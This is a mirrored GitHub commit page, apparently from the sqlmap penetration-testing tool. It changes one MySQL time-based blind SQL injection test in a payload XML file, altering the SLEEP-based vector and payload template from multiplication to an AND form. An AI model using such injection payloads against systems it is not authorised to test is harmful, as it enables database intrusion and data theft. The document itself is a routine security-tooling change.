Thanks to visit codestin.com
Credit goes to github.com

Skip to content

Commit b74edf9

Browse files
committed
Fixes #1175
1 parent 6bcc95a commit b74edf9

1 file changed

Lines changed: 3 additions & 3 deletions

File tree

xml/payloads/05_time_blind.xml

Lines changed: 3 additions & 3 deletions
Original file line numberDiff line numberDiff line change
@@ -1036,15 +1036,15 @@
10361036
</test>
10371037

10381038
<test>
1039-
<title>MySQL time-based blind - Parameter replace (bool*int)</title>
1039+
<title>MySQL time-based blind - Parameter replace (bool)</title>
10401040
<stype>5</stype>
10411041
<level>4</level>
10421042
<risk>1</risk>
10431043
<clause>1,2,3</clause>
10441044
<where>3</where>
1045-
<vector>([INFERENCE])*SLEEP([SLEEPTIME])</vector>
1045+
<vector>([INFERENCE] AND SLEEP([SLEEPTIME]))</vector>
10461046
<request>
1047-
<payload>([RANDNUM]=[RANDNUM])*SLEEP([SLEEPTIME])</payload>
1047+
<payload>([RANDNUM]=[RANDNUM] AND SLEEP([SLEEPTIME]))</payload>
10481048
</request>
10491049
<response>
10501050
<time>[SLEEPTIME]</time>

0 commit comments

Comments
 (0)